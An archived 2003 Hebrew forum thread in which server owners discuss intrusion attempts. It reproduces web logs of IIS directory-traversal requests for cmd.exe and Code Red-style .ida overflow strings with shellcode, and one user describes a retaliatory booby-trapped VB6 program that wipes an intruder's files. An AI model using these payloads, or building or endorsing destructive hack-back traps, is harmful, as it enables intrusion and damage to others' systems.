פורסם 2003 באפריל 222 שנים טוב אחרי שישמתי את כל אמצעי ההגנה הקיימים (FW+Scripts+NAT+AntiVirus) עדיין יש איזה נודניק מקליפורניה שבעזרת IP Spoofing ממשיך לתקוף לי את השרת....ISA Server detected a spoof attack from Internet Protocol (IP) address 10.31.103.126. A spoof attack occurs when an IP address that is not reachable via the interface on which the packet was received. If logging for dropped packets is set, you can view details in the packet filter log.כפי הנראה הבחור מצא לעצמו שעשוע וכל אחה"צ (שעון ישראל),כבר במשך 4 ימים, הוא מנסה לתקוף לי את השרת (או אני לא יודע מה...)מה אפשר לעשות?
פורסם 2003 באפריל 222 שנים אצלי כל יום מנסים לפרוץ לשרת ה- Apache שלי אבל כמובן לא מצליחים. שים לב ללוג שאני מקבל כל יום בערך...<860>|81.220.50.241 [02/Apr/2003:22:15:23 -0800]."GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297 <861>|81.220.50.241 [02/Apr/2003:22:15:25 -0800]."GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297 <862>|81.220.50.241 [02/Apr/2003:22:15:26 -0800]."GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288 <863>|81.220.50.241 [02/Apr/2003:22:15:27 -0800]."GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288 <864>|81.220.50.241 [02/Apr/2003:22:15:28 -0800]."GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298 <865>|81.220.50.241 [02/Apr/2003:22:15:29 -0800]."GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298 <866>|81.218.31.154 [02/Apr/2003:22:19:55 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <867>|81.218.31.154 [02/Apr/2003:22:22:09 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <868>|81.218.69.126 [02/Apr/2003:22:41:19 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <869>|81.218.108.245 [02/Apr/2003:23:00:34 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 --------------------------------------------------------------------------------<870>|81.218.27.61 [02/Apr/2003:23:04:01 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 --------------------------------------------------------------------------------לדעתי כל עוד אתה מוגן , וזה לא משפיע על העבודה שלך, אין מה לדאוג.
פורסם 2003 באפריל 222 שנים מחבר נו...ו? לא בא לך לדפוק באלה שמנסים? אולי איזה nuke קטן? אולי איזה abuse mail לספק אינטרנט?
פורסם 2003 באפריל 522 שנים אצלי כל יום מנסים לפרוץ לשרת ה- Apache שלי אבל כמובן לא מצליחים. שים לב ללוג שאני מקבל כל יום בערך...<860>|81.220.50.241 [02/Apr/2003:22:15:23 -0800]."GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297 <861>|81.220.50.241 [02/Apr/2003:22:15:25 -0800]."GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297 <862>|81.220.50.241 [02/Apr/2003:22:15:26 -0800]."GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288 <863>|81.220.50.241 [02/Apr/2003:22:15:27 -0800]."GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288 <864>|81.220.50.241 [02/Apr/2003:22:15:28 -0800]."GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298 <865>|81.220.50.241 [02/Apr/2003:22:15:29 -0800]."GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298 <866>|81.218.31.154 [02/Apr/2003:22:19:55 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <867>|81.218.31.154 [02/Apr/2003:22:22:09 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <868>|81.218.69.126 [02/Apr/2003:22:41:19 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 <869>|81.218.108.245 [02/Apr/2003:23:00:34 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 --------------------------------------------------------------------------------<870>|81.218.27.61 [02/Apr/2003:23:04:01 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285 --------------------------------------------------------------------------------לדעתי כל עוד אתה מוגן , וזה לא משפיע על העבודה שלך, אין מה לדאוג.אף אחד לא מתקיף אותך, זה וירוס נימדה הידוע, הוא עושה סריקות ומנסה להדביק עוד כתובות, דווח את זה לספק האינטרנט של האיי פי הזה והם יתפלו בזה.[/תתלונן לספק האינטרנט שלו. בארה"ב, בדר"כ, לוקחים את העניין הזה ברצינות. זהו, שגם בישראל לוקחים את זה ברצינות וכמה תיפלו לי בהמון מקרים דומים כאלו.
פורסם 2003 באפריל 522 שנים אני מריץ IIS 6, וEXCHANGE SERVER... לא יכול להיות יותר פגיע מזה.......אבל:פרצו לי פעם אחת לפני חודשיים ועשו בלאגן, סגרתי את החור, וכל יום יש לי בערך 30 ניסיונות פריצה רציניים, ועוד הרבה מאוד סקנרים מעצבנים, אבל הכל מאובטח כמו שצריך.לגבי ההתקפה, הכי טוב זה כמו שאמרת, מייל לספק + הLOG והם יטפלו בו, חוצמזה אתה יכול לנוסת מה שאני ניסיתי פעם:תעשה לו מה שנקרא מלכודת, הוא "כאילו" נכנס לC, ושם שמתי תיקייה שקוראים לה TOP-SECRET, ושם יהיה קובץעם שם מפתה כמו: "WINDOWS XP KERNEL SOURCE" או כל דבר אחר, הוא יוריד ויפתח... ובום, הקובץ הוא תוכנהקטנה שנבנתה בVB6 והיא מבלבלת את הרגיסטרי ומוחקת קבצים חשובים... שיש רק פתרון אחד: פירמוט...טיפה מתוסבך, אבל זה עובד...
פורסם 2003 באפריל 522 שנים תעשה לו מה שנקרא מלכודת, הוא "כאילו" נכנס לC, ושם שמתי תיקייה שקוראים לה TOP-SECRET, ושם יהיה קובץ עם שם מפתה כמו: "WINDOWS XP KERNEL SOURCE" או כל דבר אחר, הוא יוריד ויפתח... ובום, הקובץ הוא תוכנה קטנה שנבנתה בVB6 והיא מבלבלת את הרגיסטרי ומוחקת קבצים חשובים... שיש רק פתרון אחד: פירמוט... טיפה מתוסבך, אבל זה עובד... רעיון יפה, שימושי מאוד
ארכיון
דיון זה הועבר לארכיון ולא ניתן להוסיף בו תגובות חדשות.